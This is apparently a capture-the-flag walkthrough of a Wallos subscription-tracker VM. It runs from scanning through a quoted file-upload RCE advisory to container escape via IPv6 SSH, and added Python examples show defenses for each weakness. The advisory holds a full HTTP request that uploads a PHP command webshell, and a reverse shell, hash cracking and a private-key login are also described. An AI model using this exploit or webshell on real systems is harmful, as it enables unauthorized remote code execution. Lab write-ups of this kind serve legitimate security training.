┌──(root㉿kali)-[~]
└─# nmap -e eth1 -Pn -A -sV -T4 -p- 192.168.56.103
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-17 03:35 EST
Nmap scan report for 192.168.56.103
Host is up (0.00023s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.57 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-title: Wallos - Subscription Tracker
|_Requested resource was login.php
|_http-server-header: Apache/2.4.57 (Ubuntu)
MAC Address: 08:00:27:7F:90:98 (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=12/17%OT=80%CT=1%CU=33274%PV=Y%DS=1%DC=D%G=Y%M=0800
OS:27%TM=676137D5%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10D%TI=Z%CI=Z%
OS:II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11N
OS:W7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE8
OS:8%W6=FE88)ECN(R=Y%DF=Y%T=3F%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=3F
OS:%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=40%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=3F%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T
OS:=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=
OS:0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(
OS:R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 0.23 ms 192.168.56.103

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.04 seconds

┌──(root㉿kali)-[~]
└─# dirsearch -u 192.168.56.103
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/_192.168.56.103/_24-12-17_03-36-06.txt

Target: http://192.168.56.103/

[03:36:06] Starting:
[03:36:07] 200 - 72B - /.dockerignore
[03:36:07] 200 - 454B - /.github/
[03:36:07] 200 - 118B - /.gitignore
[03:36:07] 403 - 279B - /.ht_wsr.txt
[03:36:07] 403 - 279B - /.htaccess.bak1
[03:36:07] 403 - 279B - /.htaccess.orig
[03:36:07] 403 - 279B - /.htaccess.sample
[03:36:07] 403 - 279B - /.htaccess_extra
[03:36:07] 403 - 279B - /.htaccess_sc
[03:36:07] 403 - 279B - /.htaccessBAK
[03:36:07] 403 - 279B - /.htaccess.save
[03:36:07] 403 - 279B - /.htaccessOLD
[03:36:07] 403 - 279B - /.htaccessOLD2
[03:36:07] 403 - 279B - /.htm
[03:36:07] 403 - 279B - /.htaccess_orig
[03:36:07] 403 - 279B - /.html
[03:36:07] 403 - 279B - /.htpasswd_test
[03:36:07] 403 - 279B - /.htpasswds
[03:36:07] 403 - 279B - /.httr-oauth
[03:36:08] 403 - 279B - /.php
[03:36:15] 200 - 0B - /auth.php
[03:36:17] 200 - 7KB - /CHANGELOG.md
[03:36:19] 301 - 313B - /db -> http://192.168.56.103/db/
[03:36:19] 200 - 458B - /db/
[03:36:19] 200 - 2KB - /Dockerfile
[03:36:22] 301 - 317B - /images -> http://192.168.56.103/images/
[03:36:22] 200 - 614B - /images/
[03:36:22] 301 - 319B - /includes -> http://192.168.56.103/includes/
[03:36:22] 200 - 699B - /includes/
[03:36:24] 301 - 315B - /libs -> http://192.168.56.103/libs/
[03:36:24] 200 - 667B - /login.php
[03:36:25] 302 - 0B - /logout.php -> .
[03:36:25] 200 - 3KB - /manifest.json
[03:36:27] 200 - 1KB - /nginx.conf
[03:36:31] 301 - 322B - /screenshots -> http://192.168.56.103/screenshots/
[03:36:31] 301 - 318B - /scripts -> http://192.168.56.103/scripts/
[03:36:31] 200 - 578B - /scripts/
[03:36:32] 403 - 279B - /server-status
[03:36:32] 403 - 279B - /server-status/
[03:36:34] 200 - 1KB - /startup.sh
[03:36:34] 301 - 317B - /styles -> http://192.168.56.103/styles/

Task Completed

Information disclosure
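The dirsearch run above shows build and deployment artifacts (Dockerfile, nginx.conf, startup.sh, .dockerignore, .github/, the /db/ directory) being served from the web root. As an added example that is not part of the original writeup, the following Python parses dirsearch-style result lines and flags every reachable path that belongs to one of those categories, so a defender can turn a scan log into a list of things to remove from the document root or block in the server config. The input lines are a constructed subset copied from the output above; the path patterns are my own assumptions about what should never be web-reachable.

```python
import re

# Constructed sample: a subset of the dirsearch output lines shown above.
SCAN_LINES = """\
[03:36:07] 200 - 72B - /.dockerignore
[03:36:07] 200 - 454B - /.github/
[03:36:07] 403 - 279B - /.htaccess.bak1
[03:36:19] 301 - 313B - /db -> http://192.168.56.103/db/
[03:36:19] 200 - 458B - /db/
[03:36:19] 200 - 2KB - /Dockerfile
[03:36:24] 200 - 667B - /login.php
[03:36:27] 200 - 1KB - /nginx.conf
[03:36:32] 403 - 279B - /server-status
[03:36:34] 200 - 1KB - /startup.sh
""".splitlines()

# "[HH:MM:SS] <status> - <size> - <path> [-> redirect]"
LINE_RE = re.compile(r"^\[\d\d:\d\d:\d\d\]\s+(\d{3})\s+-\s+(\S+)\s+-\s+(\S+)")

# Assumed categories of paths that have no business being served (defender's allow/deny judgement).
SENSITIVE = [
    (re.compile(r"^/\.(git|github|gitignore|dockerignore|env)(/|$)", re.I), "VCS/CI/build metadata"),
    (re.compile(r"^/(dockerfile|docker-compose\.ya?ml)$", re.I), "container build file"),
    (re.compile(r"^/[^/]*\.(conf|sh|bak|sql|sqlite|db)$", re.I), "config/script/database file"),
    (re.compile(r"^/db/?$", re.I), "database directory"),
]


def parse_line(line):
    """Return (status, size, path) for a dirsearch result line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    status, size, path = m.groups()
    return int(status), size, path


def exposed_artifacts(lines):
    """List (path, reason) for every reachable (2xx/3xx) path matching SENSITIVE.
    4xx results are already blocked by the server and are not reported."""
    findings = []
    for line in lines:
        parsed = parse_line(line)
        if not parsed:
            continue
        status, _, path = parsed
        if status >= 400:
            continue
        for pattern, reason in SENSITIVE:
            if pattern.search(path):
                findings.append((path, reason))
                break
    return findings


if __name__ == "__main__":
    for path, reason in exposed_artifacts(SCAN_LINES):
        print(f"{path:20s} {reason}")
```

Each reported path is a candidate for removal from the document root (the Dockerfile and startup.sh should never have been copied there) or, for things that must stay, a deny rule in the Apache or nginx config; the 403 lines show that pattern already working for `.htaccess*` and `/server-status`.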

Crack the hash directly with hashcat

hashcat -m 3200 -a 0 hash.txt rockyou.txt

Log in directly

The first thing to do is look for known vulnerabilities in the framework

# Exploit Title: Wallos - File Upload RCE (Authenticated)
# Date: 2024-03-04
# Exploit Author: sml@lacashita.com
# Vendor Homepage: https://github.com/ellite/Wallos
# Software Link: https://github.com/ellite/Wallos
# Version: < 1.11.2
# Tested on: Debian 12

Wallos allows you to upload an image/logo when you create a new subscription.
This can be bypassed to upload a malicious .php file.

POC
---

1) Log into the application.
2) Go to "New Subscription"
3) Upload Logo and choose your webshell .php
4) Make the request, changing Content-Type to image/jpeg and adding "GIF89a"; it should look like:

--- SNIP -----------------

POST /endpoints/subscription/add.php HTTP/1.1
Host: 192.168.1.44
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.44/
Content-Type: multipart/form-data; boundary=---------------------------29251442139477260933920738324
Origin: http://192.168.1.44
Content-Length: 7220
Connection: close
Cookie: theme=light; language=en; PHPSESSID=6a3e5adc1b74b0f1870bbfceb16cda4b; theme=light

-----------------------------29251442139477260933920738324
Content-Disposition: form-data; name="name"

test
-----------------------------29251442139477260933920738324
Content-Disposition: form-data; name="logo"; filename="revshell.php"
Content-Type: image/jpeg

GIF89a;

<?php
system($_GET['cmd']);
?>

-----------------------------29251442139477260933920738324
Content-Disposition: form-data; name="logo-url"

----- SNIP -----

5) You will get the response that your file was uploaded ok:

{"status":"Success","message":"Subscription updated successfully"}

6) Your file will be located in:
http://VICTIM_IP/images/uploads/logos/XXXXXX-yourshell.php
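The advisory above works because the upload handler trusts two things the client controls: the declared Content-Type and the first few bytes of the file, while keeping the client-supplied `.php` extension. As an added example (not Wallos's own code, which is PHP; Python stands in here to show the logic), the following contrasts that vulnerable acceptance pattern with a hardened one that ignores the Content-Type header, requires the extension to be on an allow-list, requires the magic bytes to agree with that extension, and stores the file under a server-generated name whose extension is derived from the detected content. The multipart parts are constructed to mirror the shape of the request in the advisory; the function names and the magic-byte table are my assumptions.

```python
import os
import secrets

# Constructed multipart parts, shaped like the "logo" part of the request above:
# client-chosen filename, client-declared Content-Type, raw body bytes.
MALICIOUS_PART = {          # the bypass: .php name, image/jpeg header, GIF89a prefix
    "filename": "revshell.php",
    "content_type": "image/jpeg",
    "body": b"GIF89a;\n\n<?php\nsystem($_GET['cmd']);\n?>\n",
}
BENIGN_PART = {             # a genuine PNG signature (constructed, truncated payload)
    "filename": "logo.png",
    "content_type": "image/png",
    "body": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
}
MISMATCH_PART = {           # .png name but GIF bytes: extension and content disagree
    "filename": "logo.png",
    "content_type": "image/png",
    "body": b"GIF89a" + b"\x00" * 16,
}

# Detected type -> (accepted magic prefixes, canonical extension the server will use)
MAGIC = {
    "png":  ((b"\x89PNG\r\n\x1a\n",), ".png"),
    "gif":  ((b"GIF87a", b"GIF89a"), ".gif"),
    "jpeg": ((b"\xff\xd8\xff",), ".jpg"),
}
ALLOWED_EXT = {".png", ".gif", ".jpg", ".jpeg"}


def detect_type(body):
    """Sniff the leading bytes; returns a MAGIC key or None."""
    for name, (prefixes, _) in MAGIC.items():
        if any(body.startswith(p) for p in prefixes):
            return name
    return None


def vulnerable_accept(part):
    """The pattern the advisory defeats: trust the client's Content-Type plus a
    magic-byte sniff, then keep the client's filename (and so its .php extension).
    Returns the stored filename, or None if rejected."""
    if not part["content_type"].startswith("image/"):
        return None
    if detect_type(part["body"]) is None:
        return None
    return secrets.token_hex(3) + "-" + os.path.basename(part["filename"])


def hardened_accept(part):
    """Ignore the Content-Type header entirely (it is attacker-controlled).
    Require an allow-listed extension, require the magic bytes to agree with it,
    and store under a server-generated name whose extension comes from the
    detected content, never from the client. Returns stored filename or None."""
    ext = os.path.splitext(part["filename"])[1].lower()
    if ext not in ALLOWED_EXT:
        return None
    detected = detect_type(part["body"])
    if detected is None:
        return None
    canonical = MAGIC[detected][1]
    jpeg_alias = detected == "jpeg" and ext == ".jpeg"
    if ext != canonical and not jpeg_alias:
        return None
    return secrets.token_hex(8) + canonical


if __name__ == "__main__":
    for label, part in (("malicious", MALICIOUS_PART), ("benign", BENIGN_PART), ("mismatch", MISMATCH_PART)):
        print(f"{label:10s} vulnerable={vulnerable_accept(part)!r:24s} hardened={hardened_accept(part)!r}")
```

Even with the hardened check, a file named `shell.gif` carrying a `GIF89a` prefix followed by PHP text is still accepted, now stored as `.gif`; what keeps that harmless is the web server never executing anything under the upload directory (for Apache with mod_php, `php_admin_flag engine off` for that directory), and, where an image library is available, re-encoding the upload so that only pixel data survives.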

Upload a webshell (🐎) directly through the logo upload

Connect straight away with AntSword

It works, so upload a reverse-shell webshell (🐎)

Successfully caught the shell

Nice...

Got user.txt

Drop linpeas in

Turns out we are inside a container...

Drop fscan in and scan the /24

Found another IP, and it responds to ping

Found a private key and a public key

Pull it to the local machine and the public key can be derived from it

┌──(root㉿kali)-[~/yiyi/tmp]
└─# ssh-keygen -y -f ssh

But we can't simply log in with the private key here, because port 22 is blocked on that host over IPv4

Check the target's IPv6 address

Use ping6 with the link-local multicast address

Sending an ICMPv6 echo request to the link-local "all nodes" multicast group discovers every IPv6 device on the same link.

ping6 -I eth1 ff02::1

Try it and the host shows up right away

ssh root@fe80::a00:27ff:fe7f:9098%eth1 -i ssh 
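The last step only worked because the host filtered SSH on IPv4 while leaving the same service reachable over its IPv6 link-local address. As an added example that is not part of the original writeup, the following Python reads `iptables-save` and `ip6tables-save` style dumps, evaluates the INPUT chain with first-match semantics (the first rule naming the port decides, otherwise the chain policy does), and reports ports whose reachability differs between the two address families. The rule dumps are constructed to model the situation in the writeup and a default-DROP variant; the function names are my own.

```python
import re

# Constructed iptables-save output: SSH dropped on IPv4, MySQL rejected, default ACCEPT.
IPTABLES_SAVE = """\
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -p tcp -m tcp --dport 22 -j DROP
-A INPUT -p tcp -m tcp --dport 3306 -j REJECT --reject-with tcp-reset
COMMIT
"""

# Constructed ip6tables-save output: the SSH rule was never mirrored to IPv6.
IP6TABLES_SAVE = """\
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -p tcp -m tcp --dport 3306 -j REJECT --reject-with tcp6-reset
COMMIT
"""

# Constructed default-DROP ruleset: only what is explicitly accepted is reachable.
DEFAULT_DROP_SAVE = """\
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
COMMIT
"""

POLICY_RE = re.compile(r"^:INPUT (ACCEPT|DROP|REJECT)\b")
# Single-port INPUT rules only; multiport/--dports rules are deliberately not parsed.
RULE_RE = re.compile(r"^-A INPUT\b(?:.*?-p (tcp|udp)\b)?.*?--dport (\d+)\b.*?-j (ACCEPT|DROP|REJECT)\b")


def port_reachable(save_output, port, proto="tcp"):
    """First-match evaluation of the INPUT chain for one destination port."""
    policy = "ACCEPT"
    for line in save_output.splitlines():
        pm = POLICY_RE.match(line)
        if pm:
            policy = pm.group(1)
            continue
        rm = RULE_RE.match(line)
        if rm and int(rm.group(2)) == port and rm.group(1) in (None, proto):
            return rm.group(3) == "ACCEPT"
    return policy == "ACCEPT"


def family_gaps(v4_dump, v6_dump, ports):
    """Ports whose reachability differs between the IPv4 and IPv6 rule sets."""
    gaps = {}
    for p in ports:
        v4, v6 = port_reachable(v4_dump, p), port_reachable(v6_dump, p)
        if v4 != v6:
            gaps[p] = {"ipv4": v4, "ipv6": v6}
    return gaps


if __name__ == "__main__":
    for port, state in family_gaps(IPTABLES_SAVE, IP6TABLES_SAVE, [22, 80, 3306]).items():
        print(f"port {port}: ipv4 reachable={state['ipv4']}, ipv6 reachable={state['ipv6']}")
```

On a real host the two dumps come from `iptables-save` and `ip6tables-save` (or the equivalent nft output), and the check belongs in whatever audits the firewall, since a rule added to one family and forgotten in the other is exactly the gap the writeup walks through; scanning the link-local addresses of your own hosts with nmap's `-6` option is the complementary external check.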
